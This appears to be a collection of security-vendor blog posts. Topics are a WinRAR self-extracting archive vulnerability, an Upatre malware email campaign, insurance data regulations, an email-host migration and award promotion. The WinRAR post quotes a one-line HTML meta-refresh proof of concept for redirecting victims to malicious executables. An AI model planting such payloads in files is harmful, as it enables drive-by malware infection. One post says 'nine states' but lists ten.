Researchers at Vulnerability-Lab have discovered an issue in WinRAR software that allows for remote code execution for self extracting exe files. Self Extracting Archives (SFX files) are executable files that contains the necessary code to extract a file without needing an extractor pre-installed. So you could send someone one of these self extracting files without needing to worry if they have something like WinRAR or 7zip installed already. This can be convenient when dealing with external clients in which you may not know what software they have.

OO7XQL3Q9C (1)


This issue that was discovered has to do with the display text section of the SFX file when opened. The text section supports HTML and can remotely retrieve that HTML info needed. In the proof of concept provided by Vulnerability-Lab, that HTML could point to a server containing malicious executables and WinRAR will download and execute the remote file.


Simple HTML like this in the text window could point to the server containing malicious code to be executed:

<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=″</head></html>

Something I noticed that did work with these was to use the WinRAR option of right clicking to extract the file. This prevents opening the display window where the malicious HTML may be lurking and simply extracts the original file. But that of course doesn’t mean the extracted file is safe.




Since the HTML is interpreted as soon as the SFX file is opened, that means there’s no other user interaction required for the vulnerability to be exploited. The original file that was archived doesn’t even need to be extracted. Simply opening the file is enough. I was able to recreate this pretty simply so this could be something we will see in the future in malware campaigns. Since the SFX file still contains an exe extension, hopefully most users will already be cautious of unknown exe’s enough to know not to open it. This is certainly a prime example of why unknown attachments should be avoided.

This morning we’ve been seeing yet another offering from the Upatre guys. This time it comes in with a rather lengthy, by comparison, email with the subject line “Attorney-client agreement”. This story line certainly leaves out a few major details as it begins with a lawyer apparently already in court fighting against some sort of breach of contract suit against the recipient. The opening paragraph even forgives the intended targets for missing court this morning, citing that the court “understood”. This must come as a real shock to those of us who don’t keep a lawyer on retainer and those who didn’t realize they were being sued. It probably would’ve been really nice of this mystery lawyer to let you know that this was going on before it got to this point, I would think.


Regardless, the email goes on to give a vague report on what happened in court this day and a few things that the new defendant can expect as this fake lawsuit unfolds. This is a very classic, although slightly long-winded, social engineering technique employed by cyber thieves to both raise a little fear and a lot of curiosity in their victims which will then hopefully entice them into falling for their ruse. The payload in this attack lives in an accompanying attachment. Each of these attachments are quasi randomly named by stringing together three different words from an apparent wordlist supplied by the command and control server. This randomization makes it slightly harder to nail down these files, simply because one cannot block based on the filename alone. Otherwise, it’s business as usual when it comes to stopping these nuisances.


One interesting detail about this line of attacks is that they seem to be targeting older, out of date PCs. After running the samples on a couple different operating systems, they only seemed to want to carry out their malicious intent on machines running Windows XP (I was using SP3). On newer versions it would shut itself down almost immediately after execution. Once operational though, this malware begins to hijack system processes to get a foothold on its new victim. It then reaches out to check its IP address and then looks to communicate with the IP on port 12299 where it reports back with information about the new target such as the IP it had just looked up and the computer name. Following this, the malware adds a good number of registry entries dealing with security certificates, mostly disallowing them and peeks around for debugging tools.

Even on Windows XP these samples seemed a little rickety as they tended to crash after a fairly short period of time, but they did have the best success rate on the XP machines. I wouldn’t be surprised though if this little issue is quickly resolved and we start seeing the next campaign from these guys within the day. Seeing several different themes from this particular family of malware has been commonplace and happening on a daily basis for quite sometime now.

AppRiver’s SecureTide has everyone covered though as we’re blocking these preemptively to help keep your machines happy and healthy.

By Gretchen Clarke

Not unlike other vertical market business entities, insurance companies face a growing set of regulations and guidelines for protecting their data.

malvertising image

With an ever-evolving IT threat landscape, hacker attacks and network intrusions, protecting sensitive customer information is a growing concern for the insurance industry.  What’s more, the insurance industry may face security concerns from both sides of the table – serving the security needs of the insurers and serving the security needs of the insured.  To help illustrate, take a look at the list of sensitive information needed in order to purchase insurance:

  • Full Name
  • Date of Birth
  • Address
  • Social Security Number
  • Payment information
  • Annual income
  • Banking information
  • Other

While this information is necessary for those wanting to be insured, have you ever wondered where your information goes?  Where it’s stored?  Is it scanned into a shared file on a network or did you complete it online?  Is it emailed to the corporate office?

In the last few years, nine states have added regulations mandating that insurance companies archive and encrypt any emails containing personal/private data.  These states include:  California, Colorado, Delaware, Massachusetts, New York, Pennsylvania, Rhode Island, South Dakota, Vermont, and West Virginia, while many other states are adopting legislation to follow suit.

It’s not just about being compliant with federal and state laws.  It’s also about building customer trust.  By enhancing your service offering with best-in-breed security solutions, you’re telling customers that their privacy matters and that you’re taking the necessary steps to keep sensitive information secure.

To those companies who have traded in photocopies for online documents and to consumers who are concerned about protecting their personal/private data, we encourage you to take a look at your security footprint today.  And, if you have any questions along the way, we are here to help.

To learn more about AppRiver’s  cloud-based email encryption and email archiving & compliance solutions, please contact  (And make sure to ask about our current promotions on compliance-ready solutions!)

Last week, managed services provider Apptix announced it is shutting down its hosted Exchange service and selling part of its cloud customer division to GoDaddy. The plan is for Apptix customers who are currently on its hosted Exchange platform to migrate to GoDaddy’s Office 365.

Startup Stock Photos

Startup Stock Photos

The question is, who do you want to host your email and who would you like to work with?

In the IT world, that choice is critical because one size rarely fits all. Customers being moved off the Apptix Exchance service would be wise to ask several questions before committing to GoDaddy Office 365 (or any other email provider for that matter.)

Quite obviously, price is one key factor, but you also need to know just what you’re getting for your money. For example, does your monthly fee cover customer care? If so, for how long? And do you speak to a live person who knows the technology?

Closely related to the question of price are your terms. What if you don’t like the new provider? Can you get your money back? Are you free to leave without penalty? And can you get month-to-month, pay-as-you-go billing?

Another issue is compatibility. In many cases, email is connected to other services like spam & virus protection, email encryption, and archiving & eDiscovery. Will your new platform support these features? And will they support your provider or do they force you to a different one?

As you discuss these issues, don’t forget to talk about security. How much control to you have over where your data is stored? How serious is the provider about protecting your information? Is it built in at every level, or is it an “after-market” option?

These are just a few of the basic questions you should pose to anyone before you allow them to host your email. For some Apptix customers, moving to GoDaddy might be a great choice, always remember that it is your choice to make.

Have questions about AppRiver’s Secure Hosted Exchange? Click here to learn more.

New and dangerous threats to businesses are emerging every day.  That’s why we work around the clock to make sure we’re keeping your company safe and information secure.  But don’t just take our word for it.  Enclosed are four separate industry honors that endorse AppRiver’s success at delivering online protection to businesses:

Startup Stock Photos

It is a distinct privilege to be hand-selected by these publications for sound security practices.  And, we sure would appreciate your vote of confidence, too!

Please cast your vote today by clicking on any one of the above links.

Thank you for your ongoing support.  We sincerely appreciate it!